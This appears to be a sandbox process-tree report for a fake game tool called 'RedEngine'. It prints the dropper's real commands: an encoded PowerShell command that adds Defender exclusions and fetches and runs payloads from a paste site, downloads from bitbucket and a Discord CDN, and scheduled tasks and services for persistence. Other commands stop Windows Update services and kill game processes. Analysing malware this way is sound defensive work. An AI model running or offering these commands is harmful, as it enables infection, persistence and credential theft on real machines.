"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1224

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3044

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5432

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:5980

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:6448

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:5428

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
PID:868

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\RedEngine.zip
1⤵
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xa8,0x128,0x7ffef345ab58,0x7ffef345ab68,0x7ffef345ab78
2⤵
PID:808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:2
2⤵
PID:4940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1876 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:4028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:5080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3028 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:2460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4424 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:3252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:1944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4900 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:4620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4652 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:1328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3240 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3192 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:3556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3204 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:2568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3028 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:4060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
- Modifies registry class
PID:4608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5256 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:4944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5608 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5732 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:1616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5388 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:4416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5616 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:1368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1972 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:4132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5268 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5984 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:1
2⤵
PID:2248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:4732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 --field-trial-handle=1988,i,18237912829850617446,1758701171761193377,131072 /prefetch:8
2⤵
PID:2624

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4232

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b4 0x4f0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3560

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3744

C:\Users\Admin\AppData\Roaming\sebxspm5.emd0.exe
"C:\Users\Admin\AppData\Roaming\sebxspm5.emd0.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2260

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAC3.tmp\FAC4.tmp\FAC5.bat C:\Users\Admin\AppData\Roaming\sebxspm5.emd0.exe"
4⤵
PID:1440

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:1960

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:3756

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:4740

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:2932

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:1620

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
5⤵
- Creates scheduled task(s)
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:2576

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:4764

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1172

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7912

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:7864

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:7340

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7204

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:8036

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7408

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:7616

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:7932

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6848

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:7600

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:8148

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:8172

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:544

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:8044

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:1384

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:8152

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:7756

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:7596

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:868

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:6500

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:5480

C:\Users\Admin\AppData\Roaming\sebxspm5.emd1.exe
"C:\Users\Admin\AppData\Roaming\sebxspm5.emd1.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2936

C:\Users\Admin\AppData\Roaming\sebxspm5.emd2.exe
"C:\Users\Admin\AppData\Roaming\sebxspm5.emd2.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:628

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:5544

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5840

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
4⤵
- Launches sc.exe
PID:5504

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:5804

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
4⤵
- Launches sc.exe
PID:5836

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
4⤵
- Launches sc.exe
PID:4316

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
4⤵
- Launches sc.exe
PID:5268

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:5132

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:6128

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:4796

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:2040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4736

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
4⤵
PID:5740

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
4⤵
- Launches sc.exe
PID:4056

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
4⤵
- Launches sc.exe
PID:5672

C:\Users\Admin\AppData\Roaming\sebxspm5.emd3.exe
"C:\Users\Admin\AppData\Roaming\sebxspm5.emd3.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:2004

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FB6F.tmp\FB70.tmp\FB71.bat C:\Users\Admin\AppData\Roaming\sebxspm5.emd3.exe"
4⤵
PID:4648

C:\Windows\system32\where.exe
where node
5⤵
PID:3208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4860

C:\Windows\system32\msiexec.exe
msiexec /i nodejs-installer.msi /quiet
5⤵
PID:5168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"
5⤵
- Command and Scripting Interpreter: PowerShell
PID:7780

C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F
5⤵
- Creates scheduled task(s)
PID:6956

C:\Users\Admin\Downloads\RedEngine\RedEngine.exe
"C:\Users\Admin\Downloads\RedEngine\RedEngine.exe"
1⤵
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3908

C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh0.exe
"C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh0.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:444

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\11F4.tmp\11F5.tmp\11F6.bat C:\Users\Admin\AppData\Roaming\yqw0ekta.jmh0.exe"
4⤵
PID:5084

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:4360

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:4308

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
